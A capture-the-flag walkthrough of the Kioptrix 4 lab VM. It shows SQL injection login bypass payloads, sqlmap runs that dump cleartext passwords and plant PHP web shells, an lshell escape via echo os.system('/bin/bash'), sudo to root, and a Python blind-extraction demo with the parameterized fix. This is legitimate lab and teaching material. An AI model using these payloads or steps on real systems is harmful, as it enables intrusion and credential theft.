enum4linux NetBIOS lookup of the target:

==============================================
|    Nbtstat Information for 192.168.84.139    |
==============================================
Looking up status of 192.168.84.139
	KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
	KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
	KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
=======================================
|    Session Check on 192.168.84.139    |
=======================================
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

The null session is refused, so SMB enumeration stops here and the web server becomes the next target. Directory brute force with wfuzz:
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://192.168.84.139/FUZZ
Total requests: 3024

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000566:   403        10 L     33 W     329 Ch      "cgi-bin/"
000001337:   301        9 L      31 W     356 Ch      "images"
000001350:   200        45 L     94 W     1255 Ch     "index"
000001458:   301        9 L      31 W     354 Ch      "john"
000001629:   302        0 L      0 W      0 Ch        "logout"
000001736:   302        1 L      22 W     220 Ch      "member"
000002294:   301        9 L      31 W     356 Ch      "robert"

Total time: 3.234193
Processed Requests: 3024
Filtered Requests: 3017
Requests/sec.: 935.0089

Two of the hits, john and robert, are named after users; they turn out to be the two accounts in the application's members table. logout and member both redirect (302), which is consistent with a session-protected member area behind the login form.
Visiting the site shows a login form, and the login handler turns out to be vulnerable to SQL injection.

Manual injection

Use john as the username and 1' or '1'='1 as the password. The password is concatenated into the query without escaping, so the WHERE clause becomes username='john' and password='1' or '1'='1', which matches every row and the application logs the user in.

This yields two sets of credentials, which the application stores and displays in clear text:
Username : john Password : MyNameIsJohn
Username : robert Password : ADGAdsafdfwt4gadfga==
The same injection with sqlmap, fed the captured login POST request (sqlmap.txt). Only the mypassword parameter is injectable, which matches the escaping that checklogin.php applies to the username but not the password:

root@kali:~# sqlmap -r sqlmap.txt
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.11#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:21:00 /2019-12-10/

[01:21:00] [INFO] parsing HTTP request from 'sqlmap.txt'
[01:21:00] [INFO] resuming back-end DBMS 'mysql'
[01:21:00] [INFO] testing connection to the target URL
[01:21:00] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-9812' OR 1343=1343#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=123456' AND (SELECT 6154 FROM (SELECT(SLEEP(5)))jArz)-- bHnL&Submit=Login
---
[01:21:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[01:21:00] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.84.139'
Second run, dumping the members table through the boolean-based blind channel (each value is recovered by a series of true/false requests, which is why the run is single-threaded and slow):

[*] starting @ 01:25:36 /2019-12-10/

[01:25:36] [INFO] parsing HTTP request from 'sqlmap.txt'
[01:25:36] [INFO] resuming back-end DBMS 'mysql'
[01:25:36] [INFO] testing connection to the target URL
[01:25:36] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-9812' OR 1343=1343#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=123456' AND (SELECT 6154 FROM (SELECT(SLEEP(5)))jArz)-- bHnL&Submit=Login
---
[01:25:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[01:25:36] [INFO] fetching columns for table 'members' in database 'members'
[01:25:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[01:25:36] [INFO] retrieved: sqlmap got a 302 redirect to 'http://192.168.84.139:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
3
[01:25:38] [INFO] retrieved: id
[01:25:38] [INFO] retrieved: username
[01:25:39] [INFO] retrieved: password
[01:25:39] [INFO] fetching entries for table 'members' in database 'members'
[01:25:39] [INFO] fetching number of entries for table 'members' in database 'members'
[01:25:39] [INFO] retrieved: 2
[01:25:39] [INFO] retrieved: 1
[01:25:39] [INFO] retrieved: MyNameIsJohn
[01:25:40] [INFO] retrieved: john
[01:25:40] [INFO] retrieved: 2
[01:25:40] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[01:25:42] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

[01:25:42] [INFO] table 'members.members' dumped to CSV file '/root/.sqlmap/output/192.168.84.139/dump/members/members.csv'
[01:25:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.84.139'

[*] ending @ 01:25:42 /2019-12-10/

The passwords come back unhashed, and the one that looks like base64 (robert's) is simply what is stored, so both can be tried directly against SSH.
Getting root

After logging in over SSH as john, most commands are refused: the account is placed in a restricted shell that only allows a short list of commands. echo is one of them.
root@kali:~# ssh john@192.168.84.139
The authenticity of host '192.168.84.139 (192.168.84.139)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.84.139' (RSA) to the list of known hosts.
john@192.168.84.139's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ls
john:~$ pwd
*** unknown command: pwd
john:~$ whoami
*** unknown command: whoami
john:~$ echo 'casdcasdc'
casdcasdc
Once a real shell is available (see the escape below), the web root can be read directly. The tmp*.php files are stager/backdoor pairs left behind by earlier sqlmap --os-shell runs, not part of the application:

john@Kioptrix4:/var/www$ ls
checklogin.php  index.php          logout.php  tmpbbmjx.php  tmpbtzfy.php  tmpuijdt.php
database.sql    john               member.php  tmpbdorc.php  tmpubjrn.php  tmpureio.php
images          login_success.php  robert      tmpbstyp.php  tmpuepxr.php  tmpuyhae.php
john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo"Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}

The two commented-out lines are the whole bug: $myusername goes through mysql_real_escape_string, $mypassword does not, and the raw value is concatenated into the SELECT. Anything that makes the query return at least one row ($count!=0) logs the user in, which is exactly what 1' or '1'='1 does, and the row count is also the true/false signal sqlmap's boolean-based blind technique used to dump the table. Two further details matter for the rest of the box: the application connects to MySQL as root with an empty password, and passwords are compared (and therefore stored) in clear text.
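The manual bypass, the sqlmap blind dump and the code above are three views of the same unescaped variable. The following Python is an added example (not code from the original writeup or from the VM) that reproduces checklogin.php's query against an in-memory SQLite stand-in for the members table, shows that 1' or '1'='1 logs in, recovers a stored password one character at a time from nothing but the login-success signal (the boolean-based blind technique sqlmap used), and shows the parameterized query that closes the hole. The two rows are copied from the sqlmap dump; the helper names, the use of SQLite's quote doubling in place of mysql_real_escape_string, the oracle payload shape, and SQLite's length/substr/unicode functions standing in for their MySQL equivalents are all assumptions made for the demo.

```python
"""Added example: SQLite stand-in for checklogin.php's login query, the
1' or '1'='1 bypass, a boolean-based blind password extraction, and the
parameterized fix. Not code from the original writeup or from the VM."""
import sqlite3

# Constructed stand-in for members.members; rows copied from the sqlmap dump.
ROWS = [(1, "MyNameIsJohn", "john"), (2, "ADGAdsafdfwt4gadfga==", "robert")]


def make_db() -> sqlite3.Connection:
    """In-memory table with the three columns sqlmap enumerated."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, password TEXT, username TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", ROWS)
    return conn


def escape(value: str) -> str:
    """Assumed stand-in for mysql_real_escape_string using SQLite's quoting
    rule (double the quote). checklogin.php applies it to the username only."""
    return value.replace("'", "''")


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """checklogin.php's query: username escaped, password pasted in raw.
    True corresponds to mysql_num_rows != 0, i.e. a redirect to login_success.php."""
    sql = (f"SELECT * FROM members WHERE username='{escape(username)}' "
           f"and password='{password}'")
    return len(conn.execute(sql).fetchall()) != 0


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: bound parameters, so input never becomes SQL syntax.
    (Clear-text comparison is kept only to match the table; hash in practice.)"""
    sql = "SELECT * FROM members WHERE username=? and password=?"
    return len(conn.execute(sql, (username, password)).fetchall()) != 0


def oracle_payload(condition: str) -> str:
    """Password value that turns the login into a yes/no oracle for `condition`:
        ... and password='' OR (condition) AND ''=''
    The closing quote is supplied by the original query text."""
    return f"' OR ({condition}) AND ''='"


def blind_extract(conn: sqlite3.Connection, target: str) -> str:
    """Boolean-based blind extraction of `target`'s password using only the
    login-success signal; each vulnerable_login call is one POST in practice."""
    # 1. Length: probe length(password) > n until the oracle answers no.
    length = 0
    while vulnerable_login(conn, "nobody", oracle_payload(
            f"(SELECT length(password) FROM members WHERE username='{target}')>{length}")):
        length += 1
    # 2. Each character: binary search on its code point (7 probes for ASCII).
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"(SELECT unicode(substr(password,{pos},1)) FROM members "
                    f"WHERE username='{target}')>{mid}")
            if vulnerable_login(conn, "nobody", oracle_payload(cond)):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("john / 1' or '1'='1 (vulnerable):   ", vulnerable_login(db, "john", "1' or '1'='1"))
    print("john / 1' or '1'='1 (parameterized):", safe_login(db, "john", "1' or '1'='1"))
    for user in ("john", "robert"):
        print(f"{user}: {blind_extract(db, user)}")
```

Running it prints True for the bypass against the vulnerable query, False against the parameterized one, and both passwords recovered by the blind loop. The length probe plus roughly seven requests per character is what sqlmap automates; a 21-character password like robert's costs on the order of 170 near-identical POSTs to checklogin.php that differ only in the mypassword body and split between 302 and 200 responses, which is also the pattern a defender would look for.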
echo os.system('/bin/bash') breaks out of the restricted shell: the LigGoat Shell is lshell, a Python-based restricted shell, and this is its well-known escape. From the resulting bash prompt the MySQL root account is reachable (checklogin.php hard-codes root with an empty password). The transcript does not show what was done inside the MySQL session before exit; the password typed after sudo su landed on the already-root prompt, hence the "command not found".

root@kali:~# ssh john@192.168.84.139
john@192.168.84.139's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ ls
john@Kioptrix4:~$ mysql -h localhost -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6760
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> exit;
Bye
john@Kioptrix4:~$ sudo su
root@Kioptrix4:/home/john# MyNameIsJohn
bash: MyNameIsJohn: command not found
root@Kioptrix4:/home/john# whoami
root
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john#
root@Kioptrix4:~# cat congrats.txt
Congratulations!
You've got root.

There is more than one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.

Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on: www.kioptrix.com Thanks for playing, loneferret
Alternative route: a shell through sqlmap. First, checking whether the injected DB user is a DBA:

[*] starting @ 04:12:43 /2019-12-10/

[04:12:43] [INFO] parsing HTTP request from 'sqlmap.txt'
[04:12:43] [INFO] resuming back-end DBMS 'mysql'
[04:12:43] [INFO] testing connection to the target URL
[04:12:43] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-9812' OR 1343=1343#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=123456' AND (SELECT 6154 FROM (SELECT(SLEEP(5)))jArz)-- bHnL&Submit=Login
---
[04:12:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[04:12:43] [INFO] testing if current user is DBA
[04:12:43] [INFO] fetching current user
[04:12:43] [INFO] resumed: root@localhost
current user is DBA: True
[04:12:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.84.139'

[*] ending @ 04:12:43 /2019-12-10/

The application's hard-coded root@localhost credentials mean the injected queries run with full DBMS privileges, including FILE. If the user is a DBA, a shell can be obtained as follows:

root@kali:~# sqlmap -r sqlmap.txt --os-shell
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.11#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[*] starting @ 04:10:50 /2019-12-10/

[04:10:50] [INFO] parsing HTTP request from 'sqlmap.txt'
[04:10:50] [INFO] resuming back-end DBMS 'mysql'
[04:10:50] [INFO] testing connection to the target URL
[04:10:50] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-9812' OR 1343=1343#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=123456' AND (SELECT 6154 FROM (SELECT(SLEEP(5)))jArz)-- bHnL&Submit=Login
---
[04:10:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[04:10:50] [INFO] going to use a web backdoor for command prompt
[04:10:50] [INFO] fingerprinting the back-end DBMS operating system
[04:10:50] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[04:10:51] [INFO] retrieved the web server document root: '/var/www'
[04:10:51] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[04:10:51] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[04:10:51] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.84.139:80/tmpuhuus.php
[04:10:51] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[04:10:51] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
[04:10:53] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.84.139:80/tmpbhqem.php
[04:10:53] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ls
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
checklogin.php
database.sql
images
index.php
john
login_success.php
logout.php
member.php
robert
tmpbbmjx.php
tmpbdorc.php
tmpbhqem.php
tmpbstyp.php
tmpbtzfy.php
tmpubjrn.php
tmpuepxr.php
tmpuhuus.php
tmpuijdt.php
tmpureio.php
tmpuyhae.php
---
os-shell>

The stager reaches /var/www through the injection itself: the "LIMIT 'LINES TERMINATED BY' method" turns the existing SELECT into a SELECT ... INTO OUTFILE whose LINES TERMINATED BY clause carries the PHP, which works because the DBMS user has FILE and the mysqld process can write into the web root. The warning that the backdoor could not be uploaded through the stager is not fatal; sqlmap falls back to writing the backdoor the same way, and the resulting os-shell runs commands as the web server user. Every --os-shell attempt leaves a stager/backdoor pair (tmpXXXXX.php) in the web root, as the listing shows; these are unauthenticated web shells and must be deleted at the end of the engagement.
Writing a local file to /var/www/bullshit.php through the same injection:

[*] starting @ 04:42:12 /2019-12-10/

[04:42:12] [INFO] parsing HTTP request from 'sqlmap.txt'
[04:42:12] [INFO] resuming back-end DBMS 'mysql'
[04:42:12] [INFO] testing connection to the target URL
[04:42:12] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-9812' OR 1343=1343#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=123456' AND (SELECT 6154 FROM (SELECT(SLEEP(5)))jArz)-- bHnL&Submit=Login
---
[04:42:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[04:42:12] [INFO] fingerprinting the back-end DBMS operating system
[04:42:12] [INFO] the back-end DBMS operating system is Linux
[04:42:12] [WARNING] expect junk characters inside the file as a leftover from original query
[04:42:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
DBMS file system ('/var/www/bullshit.php')? [Y/n]
[04:42:14] [INFO] retrieved: sqlmap got a 302 redirect to 'http://192.168.84.139:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
0
[04:42:17] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[04:42:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.84.139'

[*] ending @ 04:42:17 /2019-12-10/

Written successfully. The "file has not been written" warning is a false negative: sqlmap's post-write size check retrieved 0 because that blind query ran into the 302 redirect, which was declined. Do not trust the warning either way; verify from the os-shell instead. Listing /var/www before the write:

do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
checklogin.php
database.sql
images
index.php
john
login_success.php
logout.php
member.php
robert
tmpbokko.php
tmpuvljz.php
---

and after it, where bullshit.php now exists (the "expect junk characters" warning applies, since the file is produced by the original query's INTO OUTFILE and carries its column output):

os-shell> ls
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
bullshit.php
checklogin.php
database.sql
images
index.php
john
login_success.php
logout.php
member.php
robert
tmpbokko.php
tmpuvljz.php
---
os-shell>